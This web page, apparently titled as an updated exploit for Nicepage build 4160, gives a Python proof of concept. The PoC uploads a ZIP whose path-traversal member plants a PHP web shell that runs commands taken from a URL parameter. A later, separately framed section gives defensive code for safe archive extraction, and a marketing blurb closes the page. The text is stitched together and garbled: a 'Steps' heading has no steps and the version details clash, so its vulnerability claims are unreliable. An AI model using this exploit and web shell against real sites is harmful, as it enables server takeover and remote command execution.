Nicepage 4160 Exploit Upd
Before diving into the exploit, we must understand the target. Nicepage is a popular website builder used by over 2 million users. It functions both as a WordPress plugin and a standalone HTML/CSS generator. Version 4.16 (build 4160) was released in mid-2023, introducing new dynamic grid systems and form handlers.
The vulnerability: Security researchers (alias: Dr.Web) flagged that version 4.160 (internal build 4160) contained a flawed sanitization routine inside the ajax_form_action handler.
Successful exploitation can lead to a range of malicious outcomes.
The updated exploit uploads a ZIP containing a shell.php with a path like:
./templates/malicious/../../../../shell.php
Steps:
Python PoC (condensed):
import requests, zipfile, io

# Build the archive in memory; the member name carries the traversal sequence.
z = io.BytesIO()
with zipfile.ZipFile(z, 'w') as zf:
    zf.writestr('../../../../shell.php', '<?php system($_GET["cmd"]); ?>')

# Submit the archive to the template import endpoint as a multipart upload.
r = requests.post('http://target.com/api/template/import',
                  files={'file': ('exploit.zip', z.getvalue())})
print(r.status_code)
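The traversal described above is decided by the member names inside the archive, so an import handler can reject it before writing anything to disk. The block below is an added example, not Nicepage's code or the page author's: it builds a constructed in-memory archive holding one benign template file and one entry shaped like the traversal path shown above, rejects any member whose normalized path would land outside the extraction directory or whose file type does not belong in a template archive, and extracts only when every member passes. The function names, the suffix allowlist and the archive contents are assumptions made for this illustration.

```python
import io
import os
import zipfile
from pathlib import PurePosixPath

# Constructed sample archive (not taken from the page): one legitimate template
# file and one member whose name tries to climb out of the extraction directory.
SAMPLE_ENTRIES = {
    "templates/site/index.html": b"<html></html>",
    "templates/malicious/../../../../shell.php": b"placeholder, not a real payload",
}

# Assumed allowlist of file types a template archive is permitted to contain.
ALLOWED_SUFFIXES = {".html", ".css", ".js", ".png", ".jpg", ".svg", ".json"}


def build_sample_zip(entries):
    """Write the constructed entries into an in-memory ZIP and return its bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def _stays_inside(name, dest_dir):
    """True only if the member name resolves to a path under dest_dir."""
    name = name.replace("\\", "/")  # archives built on Windows may use backslashes
    # Absolute paths and drive-letter prefixes can never be inside dest_dir.
    if name.startswith("/") or ":" in name.split("/", 1)[0]:
        return False
    dest = os.path.realpath(dest_dir)
    # Join the POSIX components onto dest and let realpath collapse any '..'.
    target = os.path.realpath(os.path.join(dest, *PurePosixPath(name).parts))
    return target == dest or target.startswith(dest + os.sep)


def check_member(name, dest_dir, allowed_suffixes):
    """Return None if the member is acceptable, otherwise a short rejection reason."""
    if not _stays_inside(name, dest_dir):
        return "path escapes extraction directory"
    is_directory = name.endswith("/")
    if not is_directory and PurePosixPath(name).suffix.lower() not in allowed_suffixes:
        return "file type not allowed in a template archive"
    return None


def classify_archive(zip_bytes, dest_dir, allowed_suffixes=ALLOWED_SUFFIXES):
    """Inspect member names without extracting; return (accepted, rejected)."""
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            reason = check_member(info.filename, dest_dir, allowed_suffixes)
            if reason is None:
                accepted.append(info.filename)
            else:
                rejected.append((info.filename, reason))
    return accepted, rejected


def safe_extract(zip_bytes, dest_dir, allowed_suffixes=ALLOWED_SUFFIXES):
    """Extract the archive only if every member passes; return the paths written.

    A single bad member rejects the whole upload: an archive that carries a
    traversal entry is hostile, not merely untidy.
    """
    accepted, rejected = classify_archive(zip_bytes, dest_dir, allowed_suffixes)
    if rejected:
        detail = "; ".join(f"{name}: {reason}" for name, reason in rejected)
        raise ValueError("refusing archive: " + detail)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in accepted:
            if name.endswith("/"):
                continue  # directories are created as needed for the files below
            # Build the destination path ourselves from the checked components.
            target = os.path.join(dest_dir, *PurePosixPath(name.replace("\\", "/")).parts)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(name))
            written.append(target)
    return written


if __name__ == "__main__":
    import tempfile

    dest = tempfile.mkdtemp()
    accepted, rejected = classify_archive(build_sample_zip(SAMPLE_ENTRIES), dest)
    print("accepted:", accepted)
    print("rejected:", rejected)
```

The path check runs on the member name before any write, and the suffix allowlist catches a PHP file that was placed at a legitimate-looking depth without any traversal at all; the two controls cover different mistakes, which is why both are applied.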
NicePage is a user-friendly website builder that allows users to create professional-looking websites without needing to learn complex coding languages. Its drag-and-drop functionality and a wide range of templates make it a popular choice for individuals and businesses looking to establish an online presence.